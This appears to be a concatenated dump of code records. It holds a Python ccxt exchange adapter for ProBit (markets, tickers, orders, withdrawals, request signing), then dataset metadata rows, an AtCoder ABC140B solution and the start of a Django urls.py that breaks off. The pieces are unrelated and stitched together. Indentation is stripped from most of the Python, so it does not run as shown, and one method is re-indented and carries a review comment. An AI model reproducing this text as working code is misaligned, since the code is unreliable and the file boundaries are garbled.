'version': 'v1',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/79268032-c4379480-7ea2-11ea-80b3-dd96bb29fd0d.jpg',
'api': {
'accounts': 'https://accounts.probit.com',
'public': 'https://api.probit.com/api/exchange',
'private': 'https://api.probit.com/api/exchange',
},
'www': 'https://www.probit.com',
'doc': [
'https://docs-en.probit.com',
'https://docs-ko.probit.com',
],
'fees': 'https://support.probit.com/hc/en-us/articles/360020968611-Trading-Fees',
'referral': 'https://www.probit.com/r/34608773',
},
'api': {
'public': {
'get': [
'market',
'currency',
'currency_with_platform',
'time',
'ticker',
'order_book',
'trade',
'candle',
],
},
'private': {
'post': [
'new_order',
'cancel_order',
'withdrawal',
],
'get': [
'balance',
'order',
'open_order',
'order_history',
'trade_history',
'deposit_address',
],
},
'accounts': {
'post': [
'token',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.2 / 100,
'taker': 0.2 / 100,
},
},
'exceptions': {
'exact': {
'UNAUTHORIZED': AuthenticationError,
'INVALID_ARGUMENT': BadRequest, # Parameters are not a valid format, parameters are empty, or out of range, or a parameter was sent when not required.
'TRADING_UNAVAILABLE': ExchangeNotAvailable,
'NOT_ENOUGH_BALANCE': InsufficientFunds,
'NOT_ALLOWED_COMBINATION': BadRequest,
'INVALID_ORDER': InvalidOrder, # Requested order does not exist, or it is not your order
'RATE_LIMIT_EXCEEDED': RateLimitExceeded, # You are sending requests too frequently. Please try it later.
'MARKET_UNAVAILABLE': ExchangeNotAvailable, # Market is closed today
'INVALID_MARKET': BadSymbol, # Requested market is not exist
'INVALID_CURRENCY': BadRequest, # Requested currency is not exist on ProBit system
'TOO_MANY_OPEN_ORDERS': DDoSProtection, # Too many open orders
'DUPLICATE_ADDRESS': InvalidAddress, # Address already exists in withdrawal address list
},
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'precisionMode': TICK_SIZE,
'options': {
'createMarketBuyOrderRequiresPrice': True,
'timeInForce': {
'limit': 'gtc',
'market': 'ioc',
},
},
'commonCurrencies': {
'BTCBEAR': 'BEAR',
'BTCBULL': 'BULL',
'CBC': 'CryptoBharatCoin',
'UNI': 'UNICORN Token',
},
})
def fetch_markets(self, params={}):
response = self.publicGetMarket(params)
#
# {
# "data":[
# {
# "id":"MONA-USDT",
# "base_currency_id":"MONA",
# "quote_currency_id":"USDT",
# "min_price":"0.001",
# "max_price":"9999999999999999",
# "price_increment":"0.001",
# "min_quantity":"0.0001",
# "max_quantity":"9999999999999999",
# "quantity_precision":4,
# "min_cost":"1",
# "max_cost":"9999999999999999",
# "cost_precision":8,
# "taker_fee_rate":"0.2",
# "maker_fee_rate":"0.2",
# "show_in_ui":true,
# "closed":false
# },
# ]
# }
#
markets = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(markets)):
market = markets[i]
id = self.safe_string(market, 'id')
baseId = self.safe_string(market, 'base_currency_id')
quoteId = self.safe_string(market, 'quote_currency_id')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
closed = self.safe_value(market, 'closed', False)
active = not closed
amountPrecision = self.safe_integer(market, 'quantity_precision')
costPrecision = self.safe_integer(market, 'cost_precision')
precision = {
'amount': 1 / math.pow(10, amountPrecision),
'price': self.safe_float(market, 'price_increment'),
'cost': 1 / math.pow(10, costPrecision),
}
takerFeeRate = self.safe_float(market, 'taker_fee_rate')
makerFeeRate = self.safe_float(market, 'maker_fee_rate')
result.append({
'id': id,
'info': market,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'precision': precision,
'taker': takerFeeRate / 100,
'maker': makerFeeRate / 100,
'limits': {
'amount': {
'min': self.safe_float(market, 'min_quantity'),
'max': self.safe_float(market, 'max_quantity'),
},
'price': {
'min': self.safe_float(market, 'min_price'),
'max': self.safe_float(market, 'max_price'),
},
'cost': {
'min': self.safe_float(market, 'min_cost'),
'max': self.safe_float(market, 'max_cost'),
},
},
})
return result
def fetch_currencies(self, params={}):
response = self.publicGetCurrencyWithPlatform(params)
#
# {
# "data":[
# {
# "id":"USDT",
# "display_name":{"ko-kr":"테더","en-us":"Tether"},
# "show_in_ui":true,
# "platform":[
# {
# "id":"ETH",
# "priority":1,
# "deposit":true,
# "withdrawal":true,
# "currency_id":"USDT",
# "precision":6,
# "min_confirmation_count":15,
# "require_destination_tag":false,
# "display_name":{"name":{"ko-kr":"ERC-20","en-us":"ERC-20"}},
# "min_deposit_amount":"0",
# "min_withdrawal_amount":"1",
# "withdrawal_fee":[
# {"amount":"0.01","priority":2,"currency_id":"ETH"},
# {"amount":"1.5","priority":1,"currency_id":"USDT"},
# ],
# "deposit_fee":{},
# "suspended_reason":"",
# "deposit_suspended":false,
# "withdrawal_suspended":false
# },
# {
# "id":"OMNI",
# "priority":2,
# "deposit":true,
# "withdrawal":true,
# "currency_id":"USDT",
# "precision":6,
# "min_confirmation_count":3,
# "require_destination_tag":false,
# "display_name":{"name":{"ko-kr":"OMNI","en-us":"OMNI"}},
# "min_deposit_amount":"0",
# "min_withdrawal_amount":"5",
# "withdrawal_fee":[{"amount":"5","priority":1,"currency_id":"USDT"}],
# "deposit_fee":{},
# "suspended_reason":"wallet_maintenance",
# "deposit_suspended":false,
# "withdrawal_suspended":false
# }
# ],
# "stakeable":false,
# "unstakeable":false,
# "auto_stake":false,
# "auto_stake_amount":"0"
# }
# ]
# }
#
currencies = self.safe_value(response, 'data')
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = self.safe_string(currency, 'id')
code = self.safe_currency_code(id)
displayName = self.safe_value(currency, 'display_name')
name = self.safe_string(displayName, 'en-us')
platforms = self.safe_value(currency, 'platform', [])
platformsByPriority = self.sort_by(platforms, 'priority')
platform = self.safe_value(platformsByPriority, 0, {})
precision = self.safe_integer(platform, 'precision')
depositSuspended = self.safe_value(platform, 'deposit_suspended')
withdrawalSuspended = self.safe_value(platform, 'withdrawal_suspended')
active = not (depositSuspended and withdrawalSuspended)
withdrawalFees = self.safe_value(platform, 'withdrawal_fee', {})
withdrawalFeesByPriority = self.sort_by(withdrawalFees, 'priority')
withdrawalFee = self.safe_value(withdrawalFeesByPriority, 0, {})
fee = self.safe_float(withdrawalFee, 'amount')
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': active,
'fee': fee,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'price': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'cost': {
'min': None,
'max': None,
},
'deposit': {
'min': self.safe_float(platform, 'min_deposit_amount'),
'max': None,
},
'withdraw': {
'min': self.safe_float(platform, 'min_withdrawal_amount'),
'max': None,
},
},
}
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetBalance(params)
#
# {
# data: [
# {
# "currency_id":"XRP",
# "total":"100",
# "available":"0",
# }
# ]
# }
#
data = self.safe_value(response, 'data')
result = {'info': data}
for i in range(0, len(data)):
balance = data[i]
currencyId = self.safe_string(balance, 'currency_id')
code = self.safe_currency_code(currencyId)
account = self.account()
account['total'] = self.safe_float(balance, 'total')
account['free'] = self.safe_float(balance, 'available')
result[code] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
}
response = self.publicGetOrderBook(self.extend(request, params))
#
# {
# data: [
# {side: 'buy', price: '0.000031', quantity: '10'},
# {side: 'buy', price: '0.00356007', quantity: '4.92156877'},
# {side: 'sell', price: '0.1857', quantity: '0.17'},
# ]
# }
#
data = self.safe_value(response, 'data', [])
dataBySide = self.group_by(data, 'side')
return self.parse_order_book(dataBySide, None, 'buy', 'sell', 'price', 'quantity')
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
request = {}
if symbols is not None:
marketIds = self.market_ids(symbols)
request['market_ids'] = ','.join(marketIds)
response = self.publicGetTicker(self.extend(request, params))
#
# {
# "data":[
# {
# "last":"0.022902",
# "low":"0.021693",
# "high":"0.024093",
# "change":"-0.000047",
# "base_volume":"15681.986",
# "quote_volume":"360.514403624",
# "market_id":"ETH-BTC",
# "time":"2020-04-12T18:43:38.000Z"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_tickers(data, symbols)
def parse_tickers(self, rawTickers, symbols=None):
tickers = []
for i in range(0, len(rawTickers)):
tickers.append(self.parse_ticker(rawTickers[i]))
return self.filter_by_array(tickers, 'symbol', symbols)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market_ids': market['id'],
}
response = self.publicGetTicker(self.extend(request, params))
#
# {
# "data":[
# {
# "last":"0.022902",
# "low":"0.021693",
# "high":"0.024093",
# "change":"-0.000047",
# "base_volume":"15681.986",
# "quote_volume":"360.514403624",
# "market_id":"ETH-BTC",
# "time":"2020-04-12T18:43:38.000Z"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
ticker = self.safe_value(data, 0)
if ticker is None:
raise BadResponse(self.id + ' fetchTicker() returned an empty response')
return self.parse_ticker(ticker, market)
def parse_ticker(self, ticker, market=None):
#
# {
# "last":"0.022902",
# "low":"0.021693",
# "high":"0.024093",
# "change":"-0.000047",
# "base_volume":"15681.986",
# "quote_volume":"360.514403624",
# "market_id":"ETH-BTC",
# "time":"2020-04-12T18:43:38.000Z"
# }
#
timestamp = self.parse8601(self.safe_string(ticker, 'time'))
marketId = self.safe_string(ticker, 'market_id')
symbol = self.safe_symbol(marketId, market, '-')
close = self.safe_float(ticker, 'last')
change = self.safe_float(ticker, 'change')
percentage = None
open = None
if change is not None:
if close is not None:
open = close - change
percentage = (change / open) * 100
baseVolume = self.safe_float(ticker, 'base_volume')
quoteVolume = self.safe_float(ticker, 'quote_volume')
vwap = self.vwap(baseVolume, quoteVolume)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': None,
'bidVolume': None,
'ask': None,
'askVolume': None,
'vwap': vwap,
'open': open,
'close': close,
'last': close,
'previousClose': None, # previous day close
'change': change,
'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = None
request = {
'limit': 100,
'start_time': self.iso8601(0),
'end_time': self.iso8601(self.milliseconds()),
}
if symbol is not None:
market = self.market(symbol)
request['market_id'] = market['id']
if since is not None:
request['start_time'] = self.iso8601(since)
if limit is not None:
request['limit'] = limit
response = self.privateGetTradeHistory(self.extend(request, params))
#
# {
# data: [
# {
# "id":"BTC-USDT:183566",
# "order_id":"17209376",
# "side":"sell",
# "fee_amount":"0.657396569175",
# "fee_currency_id":"USDT",
# "status":"settled",
# "price":"6573.96569175",
# "quantity":"0.1",
# "cost":"657.396569175",
# "time":"2018-08-10T06:06:46.000Z",
# "market_id":"BTC-USDT"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
'limit': 100,
'start_time': '1970-01-01T00:00:00.000Z',
'end_time': self.iso8601(self.milliseconds()),
}
if since is not None:
request['start_time'] = self.iso8601(since)
if limit is not None:
request['limit'] = limit
response = self.publicGetTrade(self.extend(request, params))
#
# {
# "data":[
# {
# "id":"ETH-BTC:3331886",
# "price":"0.022981",
# "quantity":"12.337",
# "time":"2020-04-12T20:55:42.371Z",
# "side":"sell",
# "tick_direction":"down"
# },
# {
# "id":"ETH-BTC:3331885",
# "price":"0.022982",
# "quantity":"6.472",
# "time":"2020-04-12T20:55:39.652Z",
# "side":"sell",
# "tick_direction":"down"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "id":"ETH-BTC:3331886",
# "price":"0.022981",
# "quantity":"12.337",
# "time":"2020-04-12T20:55:42.371Z",
# "side":"sell",
# "tick_direction":"down"
# }
#
# fetchMyTrades(private)
#
# {
# "id":"BTC-USDT:183566",
# "order_id":"17209376",
# "side":"sell",
# "fee_amount":"0.657396569175",
# "fee_currency_id":"USDT",
# "status":"settled",
# "price":"6573.96569175",
# "quantity":"0.1",
# "cost":"657.396569175",
# "time":"2018-08-10T06:06:46.000Z",
# "market_id":"BTC-USDT"
# }
#
timestamp = self.parse8601(self.safe_string(trade, 'time'))
id = self.safe_string(trade, 'id')
marketId = None
if id is not None:
parts = id.split(':')
marketId = self.safe_string(parts, 0)
marketId = self.safe_string(trade, 'market_id', marketId)
symbol = self.safe_symbol(marketId, market, '-')
side = self.safe_string(trade, 'side')
price = self.safe_float(trade, 'price')
amount = self.safe_float(trade, 'quantity')
cost = None
if price is not None:
if amount is not None:
cost = price * amount
orderId = self.safe_string(trade, 'order_id')
feeCost = self.safe_float(trade, 'fee_amount')
fee = None
if feeCost is not None:
feeCurrencyId = self.safe_string(trade, 'fee_currency_id')
feeCurrencyCode = self.safe_currency_code(feeCurrencyId)
fee = {
'cost': feeCost,
'currency': feeCurrencyCode,
}
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': None,
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_time(self, params={}):
response = self.publicGetTime(params)
#
# {"data":"2020-04-12T18:54:25.390Z"}
#
timestamp = self.parse8601(self.safe_string(response, 'data'))
return timestamp
def normalize_ohlcv_timestamp(self, timestamp, timeframe, after=False):
duration = self.parse_timeframe(timeframe)
if timeframe == '1M':
iso8601 = self.iso8601(timestamp)
parts = iso8601.split('-')
year = self.safe_string(parts, 0)
month = self.safe_integer(parts, 1)
if after:
month = self.sum(month, 1)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
return year + '-' + month + '-01T00:00:00.000Z'
elif timeframe == '1w':
timestamp = int(timestamp / 1000)
firstSunday = 259200 # 1970-01-04T00:00:00.000Z
difference = timestamp - firstSunday
numWeeks = self.integer_divide(difference, duration)
previousSunday = self.sum(firstSunday, numWeeks * duration)
if after:
previousSunday = self.sum(previousSunday, duration)
return self.iso8601(previousSunday * 1000)
else:
timestamp = int(timestamp / 1000)
timestamp = duration * int(timestamp / duration)
if after:
timestamp = self.sum(timestamp, duration)
return self.iso8601(timestamp * 1000)
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
interval = self.timeframes[timeframe]
limit = 100 if (limit is None) else limit
requestLimit = self.sum(limit, 1)
requestLimit = min(1000, requestLimit) # max 1000
request = {
'market_ids': market['id'],
'interval': interval,
'sort': 'asc', # 'asc' will always include the start_time, 'desc' will always include end_time
'limit': requestLimit, # max 1000
}
now = self.milliseconds()
duration = self.parse_timeframe(timeframe)
startTime = since
endTime = now
if since is None:
if limit is None:
raise ArgumentsRequired(self.id + ' fetchOHLCV requires either a since argument or a limit argument')
else:
startTime = now - limit * duration * 1000
else:
if limit is None:
endTime = now
else:
endTime = self.sum(since, self.sum(limit, 1) * duration * 1000)
startTimeNormalized = self.normalize_ohlcv_timestamp(startTime, timeframe)
endTimeNormalized = self.normalize_ohlcv_timestamp(endTime, timeframe, True)
request['start_time'] = startTimeNormalized
request['end_time'] = endTimeNormalized
response = self.publicGetCandle(self.extend(request, params))
#
# {
# "data":[
# {
# "market_id":"ETH-BTC",
# "open":"0.02811",
# "close":"0.02811",
# "low":"0.02811",
# "high":"0.02811",
# "base_volume":"0.0005",
# "quote_volume":"0.000014055",
# "start_time":"2018-11-30T18:19:00.000Z",
# "end_time":"2018-11-30T18:20:00.000Z"
# },
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_ohlcvs(data, market, timeframe, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "market_id":"ETH-BTC",
# "open":"0.02811",
# "close":"0.02811",
# "low":"0.02811",
# "high":"0.02811",
# "base_volume":"0.0005",
# "quote_volume":"0.000014055",
# "start_time":"2018-11-30T18:19:00.000Z",
# "end_time":"2018-11-30T18:20:00.000Z"
# }
#
return [
self.parse8601(self.safe_string(ohlcv, 'start_time')),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'base_volume'),
]
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
since = self.parse8601(since)
request = {}
market = None
if symbol is not None:
market = self.market(symbol)
request['market_id'] = market['id']
response = self.privateGetOpenOrder(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_orders(data, market, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {
'start_time': self.iso8601(0),
'end_time': self.iso8601(self.milliseconds()),
'limit': 100,
}
market = None
if symbol is not None:
market = self.market(symbol)
request['market_id'] = market['id']
if since:
request['start_time'] = self.iso8601(since)
if limit:
request['limit'] = limit
response = self.privateGetOrderHistory(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_orders(data, market, since, limit)
def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
}
clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_order_id')
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
else:
request['order_id'] = id
query = self.omit(params, ['clientOrderId', 'client_order_id'])
response = self.privateGetOrder(self.extend(request, query))
data = self.safe_value(response, 'data', [])
order = self.safe_value(data, 0)
return self.parse_order(order, market)
def parse_order_status(self, status):
statuses = {
'open': 'open',
'cancelled': 'canceled',
'filled': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# {
# id: string,
# user_id: string,
# market_id: string,
# type: 'orderType',
# side: 'side',
# quantity: string,
# limit_price: string,
# time_in_force: 'timeInForce',
# filled_cost: string,
# filled_quantity: string,
# open_quantity: string,
# cancelled_quantity: string,
# status: 'orderStatus',
# time: 'date',
# client_order_id: string,
# }
#
status = self.parse_order_status(self.safe_string(order, 'status'))
id = self.safe_string(order, 'id')
type = self.safe_string(order, 'type')
side = self.safe_string(order, 'side')
marketId = self.safe_string(order, 'market_id')
symbol = self.safe_symbol(marketId, market, '-')
timestamp = self.parse8601(self.safe_string(order, 'time'))
price = self.safe_float(order, 'limit_price')
filled = self.safe_float(order, 'filled_quantity')
remaining = self.safe_float(order, 'open_quantity')
canceledAmount = self.safe_float(order, 'cancelled_quantity')
if canceledAmount is not None:
remaining = self.sum(remaining, canceledAmount)
amount = self.safe_float(order, 'quantity', self.sum(filled, remaining))
cost = self.safe_float_2(order, 'filled_cost', 'cost')
if type == 'market':
price = None
average = None
if filled is not None:
if cost is None:
if price is not None:
cost = price * filled
if cost is not None:
if filled > 0:
average = cost / filled
clientOrderId = self.safe_string(order, 'client_order_id')
if clientOrderId == '':
clientOrderId = None
timeInForce = self.safe_string_upper(order, 'time_in_force')
return {
'id': id,
'info': order,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': timeInForce,
'side': side,
'status': status,
'price': price,
'stopPrice': None,
'amount': amount,
'filled': filled,
'remaining': remaining,
'average': average,
'cost': cost,
'fee': None,
'trades': None,
}
def cost_to_precision(self, symbol, cost):
return self.decimal_to_precision(cost, TRUNCATE, self.markets[symbol]['precision']['cost'], self.precisionMode)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
options = self.safe_value(self.options, 'timeInForce')
defaultTimeInForce = self.safe_value(options, type)
timeInForce = self.safe_string_2(params, 'timeInForce', 'time_in_force', defaultTimeInForce)
request = {
'market_id': market['id'],
'type': type,
'side': side,
'time_in_force': timeInForce,
}
clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_order_id')
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
costToPrecision = None
if type == 'limit':
request['limit_price'] = self.price_to_precision(symbol, price)
request['quantity'] = self.amount_to_precision(symbol, amount)
elif type == 'market':
# for market buy it requires the amount of quote currency to spend
if side == 'buy':
cost = self.safe_float(params, 'cost')
createMarketBuyOrderRequiresPrice = self.safe_value(self.options, 'createMarketBuyOrderRequiresPrice', True)
if createMarketBuyOrderRequiresPrice:
if price is not None:
if cost is None:
cost = amount * price
elif cost is None:
raise InvalidOrder(self.id + " createOrder() requires the price argument for market buy orders to calculate total order cost(amount to spend), where cost = amount * price. Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False and supply the total cost value in the 'amount' argument or in the 'cost' extra parameter(the exchange-specific behaviour)")
else:
cost = amount if (cost is None) else cost
costToPrecision = self.cost_to_precision(symbol, cost)
request['cost'] = costToPrecision
else:
request['quantity'] = self.amount_to_precision(symbol, amount)
query = self.omit(params, ['timeInForce', 'time_in_force', 'clientOrderId', 'client_order_id'])
response = self.privatePostNewOrder(self.extend(request, query))
#
# {
# data: {
# id: string,
# user_id: string,
# market_id: string,
# type: 'orderType',
# side: 'side',
# quantity: string,
# limit_price: string,
# time_in_force: 'timeInForce',
# filled_cost: string,
# filled_quantity: string,
# open_quantity: string,
# cancelled_quantity: string,
# status: 'orderStatus',
# time: 'date',
# client_order_id: string,
# }
# }
#
data = self.safe_value(response, 'data')
order = self.parse_order(data, market)
# a workaround for incorrect huge amounts
# returned by the exchange on market buys
if (type == 'market') and (side == 'buy'):
order['amount'] = None
order['cost'] = float(costToPrecision)
order['remaining'] = None
return order
def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
'order_id': id,
}
response = self.privatePostCancelOrder(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_order(data)
def parse_deposit_address(self, depositAddress, currency=None):
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string(depositAddress, 'destination_tag')
currencyId = self.safe_string(depositAddress, 'currency_id')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency_id': currency['id'],
}
response = self.privateGetDepositAddress(self.extend(request, params))
#
# {
# "data":[
# {
# "currency_id":"ETH",
# "address":"0x12e2caf3c4051ba1146e612f532901a423a9898a",
# "destination_tag":null
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
firstAddress = self.safe_value(data, 0)
if firstAddress is None:
raise InvalidAddress(self.id + ' fetchDepositAddress returned an empty response')
return self.parse_deposit_address(firstAddress, currency)
def fetch_deposit_addresses(self, codes=None, params={}):
self.load_markets()
request = {}
if codes:
currencyIds = []
for i in range(0, len(codes)):
currency = self.currency(codes[i])
currencyIds.append(currency['id'])
request['currency_id'] = ','.join(codes)
response = self.privateGetDepositAddress(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_deposit_addresses(data)
def parse_deposit_addresses(self, addresses):
result = {}
for i in range(0, len(addresses)):
address = self.parse_deposit_address(addresses[i])
code = address['currency']
result[code] = address
return result
def withdraw(self, code, amount, address, tag=None, params={}):
# In order to use self method
# you need to allow API withdrawal from the API Settings Page, and
# and register the list of withdrawal addresses and destination tags on the API Settings page
# you can only withdraw to the registered addresses using the API
self.check_address(address)
self.load_markets()
currency = self.currency(code)
if tag is None:
tag = ''
request = {
'currency_id': currency['id'],
# 'platform_id': 'ETH', # if omitted it will use the default platform for the currency
'address': address,
'destination_tag': tag,
'amount': self.currency_to_precision(code, amount),
# which currency to pay the withdrawal fees
# only applicable for currencies that accepts multiple withdrawal fee options
# 'fee_currency_id': 'ETH', # if omitted it will use the default fee policy for each currency
# whether the amount field includes fees
# 'include_fee': False, # makes sense only when fee_currency_id is equal to currency_id
}
response = self.privatePostWithdrawal(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_transaction(data, currency)
def parse_transaction(self, transaction, currency=None):
id = self.safe_string(transaction, 'id')
amount = self.safe_float(transaction, 'amount')
address = self.safe_string(transaction, 'address')
tag = self.safe_string(transaction, 'destination_tag')
txid = self.safe_string(transaction, 'hash')
timestamp = self.parse8601(self.safe_string(transaction, 'time'))
type = self.safe_string(transaction, 'type')
currencyId = self.safe_string(transaction, 'currency_id')
code = self.safe_currency_code(currencyId)
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
feeCost = self.safe_float(transaction, 'fee')
fee = None
if feeCost is not None and feeCost != 0:
fee = {
'currency': code,
'cost': feeCost,
}
return {
'id': id,
'currency': code,
'amount': amount,
'addressFrom': None,
'address': address,
'addressTo': address,
'tagFrom': None,
'tag': tag,
'tagTo': tag,
'status': status,
'type': type,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': fee,
'info': transaction,
}
def parse_transaction_status(self, status):
statuses = {
'requested': 'pending',
'pending': 'pending',
'confirming': 'pending',
'confirmed': 'pending',
'applying': 'pending',
'done': 'ok',
'cancelled': 'canceled',
'cancelling': 'canceled',
}
return self.safe_string(statuses, status, status)
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/'
query = self.omit(params, self.extract_params(path))
if api == 'accounts':
self.check_required_credentials()
url += self.implode_params(path, params)
auth = self.apiKey + ':' + self.secret
auth64 = self.string_to_base64(auth)
headers = {
'Authorization': 'Basic ' + self.decode(auth64),
'Content-Type': 'application/json',
}
if query:
body = self.json(query)
else:
url += self.version + '/'
if api == 'public':
url += self.implode_params(path, params)
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
now = self.milliseconds()
self.check_required_credentials()
expires = self.safe_integer(self.options, 'expires')
if (expires is None) or (expires < now):
raise AuthenticationError(self.id + ' access token expired, call signIn() method')
accessToken = self.safe_string(self.options, 'accessToken')
headers = {
'Authorization': 'Bearer ' + accessToken,
}
url += self.implode_params(path, params)
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
elif query:
body = self.json(query)
headers['Content-Type'] = 'application/json'
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def sign_in(self, params={}):
self.check_required_credentials()
request = {
'grant_type': 'client_credentials', # the only supported value
}
response = self.accountsPostToken(self.extend(request, params))
#
# {
# access_token: '0ttDv/2hTTn3bLi8GP1gKaneiEQ6+0hOBenPrxNQt2s=',
# token_type: 'bearer',
# expires_in: 900
# }
#
expiresIn = self.safe_integer(response, 'expires_in')
accessToken = self.safe_string(response, 'access_token')
self.options['accessToken'] = accessToken
self.options['expires'] = self.sum(self.milliseconds(), expiresIn * 1000)
return response
    def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
        """Translate an exchange error payload into a ccxt exception.

        Returns None (deferring to the default error handler) when there is
        no parsed response or the response carries no 'errorCode'.
        """
        if response is None:
            return  # fallback to default error handler
        if 'errorCode' in response:
            errorCode = self.safe_string(response, 'errorCode')
            message = self.safe_string(response, 'message')
            if errorCode is not None:
                feedback = self.id + ' ' + body
                self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
                # NOTE(review): the broad matcher is fed the 'exact' map here;
                # if self.exceptions defines a 'broad' map, this line probably
                # meant self.exceptions['broad'] -- confirm before changing.
                self.throw_broadly_matched_exception(self.exceptions['exact'], errorCode, feedback)
                raise ExchangeError(feedback)
| [
"[email protected]"
] | |
a44a8301d9cf018c0b5ff5bc64748a1262eda343 | b9eb496c4551fd091954675a61382636fc68e715 | /src/ABC1xx/ABC14x/ABC140/ABC140B.py | 8357fa46e4c56c5d78f10b2adcc2a1f6074cfb70 | [] | no_license | kttaroha/AtCoder | af4c5783d89a61bc6a40f59be5e0992980cc8467 | dc65ce640954da8c2ad0d1b97580da50fba98a55 | refs/heads/master | 2021-04-17T16:52:09.508706 | 2020-11-22T05:45:08 | 2020-11-22T05:45:08 | 249,460,649 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | def main():
    # AtCoder ABC140 B: total satisfaction is B[a] for every dish eaten,
    # plus bonus C[i] whenever dish i+1 is eaten immediately after dish i.
    _ = int(input())  # N (number of dishes); implied by len(A), value unused
    A = list(map(int, input().split()))  # eating order, 1-indexed dish ids
    B = list(map(int, input().split()))  # base satisfaction per dish
    C = list(map(int, input().split()))  # C[i-1]: bonus when dish i+1 follows dish i
    prev = -100  # sentinel: guarantees no bonus on the first dish
    s = 0
    for a in A:
        s += B[a-1]
        if a - prev == 1:
            # consecutive dishes: bonus is indexed by the earlier dish
            s += C[prev-1]
        prev = a
    print(s)
if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
2b67e235a3490fd768faa695ff32d76ed01f6f61 | a6bd25c3508d45134436bc3a39345e2565debec0 | /Assignment1/urls.py | 1fec19327932a4d972c8807b1a1ec09c09df8b86 | [] | no_license | gitNikhilsahu/Django-Business-Employee-Management | 2a869dbf9c0aac078662b09db708b7c03b372c5c | e1c6d1588561abf193d70ca4cb91c912c3ea66d1 | refs/heads/master | 2022-12-17T07:58:25.655611 | 2020-09-25T08:43:18 | 2020-09-25T08:43:18 | 298,517,130 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | from django.contrib import admin
from django.urls import path, include
from django.conf import settings
